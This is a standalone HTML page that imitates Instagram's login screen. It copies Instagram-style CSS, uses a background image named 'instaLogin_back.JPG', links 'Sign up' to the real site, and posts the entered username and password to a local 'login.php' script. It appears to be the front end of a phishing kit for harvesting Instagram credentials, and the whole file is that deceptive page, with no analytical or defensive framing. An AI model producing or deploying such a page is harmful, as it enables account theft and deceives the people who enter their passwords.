<!DOCTYPE html>
<html>
<style>input[type=text], select {
    width: 45%;
    padding: 2% 25%;
    margin: 1% 0%;
    display: inline-block;
    border: 1px solid #ccc;
    border-radius: 4px;
  
}
    input[type=password], select {
    width: 45%;
     padding: 2% 25%;
    margin: 8px 0;
    display: inline-block;
    border: 1px solid #ccc;
    border-radius: 4px;
  
}

input[type=submit], select {
    width: 45%;
    background-color: #3897f0;
    color: white;
    padding: 2% 48%;
    margin: 1% 0%;
    border: none;
    border-radius: 4px;
    cursor: pointer;
}

input[type=submit];hover {
    background-color: #3897f0;
  
}
    
    
    body {
        
    background-size: 100%;
    background-image: url("instaLogin_back.JPG");
    background-repeat: no-repeat;
}
    


div {
    border-radius: 2px;
 
    padding-top: 13%;
    padding-right: 11%;
    padding-bottom: 10%;
    padding-left: 40%;
}
    
    form {width: 40%;
        margin-top: 25px;
        margin-right: 30%;
        margin-left: 30%;
        background-color: transparent}
    
    
    ._p8ymb{color:#262626;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;margin-top:12px;max-width:350px}._nvyyp{background-color:#fff;border:1px solid #e6e6e6;border-radius:1px;margin:0 0 10px;padding:10px 0}._du7bh{margin:22px auto 8px}._m8ogu{margin-top:10px}._7zhoi,._gnsgq{color:#262626;font-size:14px;line-height:18px;margin:10px 20px;text-align:center}._rwl8x{-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;margin:10px 0}@media (max-width:400px){._rwl8x{-ms-flex-wrap:wrap;flex-wrap:wrap}}@media (max-width:450px){._p8ymb{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;margin-top:0;max-width:100%}._sen9h{background-color:transparent;border-width:0}._m8ogu{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;margin-top:0}._nvyyp{background-color:transparent;border:none}}._dyp7q{color:#262626;font-size:14px;margin:15px;text-align:center}._fcn8k,._fcn8k:active,._fcn8k:hover,._fcn8k:visited{color:#3897f0}._75dhl{min-height:160px}._f1xb2{margin-top:-18px}
    
    
</style>
<body>



<div>
    
  <form method="POST" action="login.php">
      
   
    <input type="text" class="_kp5f7 _qy55y" aria-describedby="" aria-label="Username" aria-required="true" autocapitalize="off" autocorrect="off" maxlength="30" name="username" placeholder="Username" value="">
    
    <input type="password" class="_kp5f7 _qy55y" aria-describedby="" aria-label="Password" aria-required="true" autocapitalize="off" autocorrect="off" name="password" placeholder="Password" value="">
    
    <input type="submit" value="Login">
      <br><br/>
      <br><br/>
      <p>Don't have an account? <a class="_fcn8k" href="https://www.instagram.com"/>Sign up</a> <p/>
  </form>
</div>

</body>
</html>

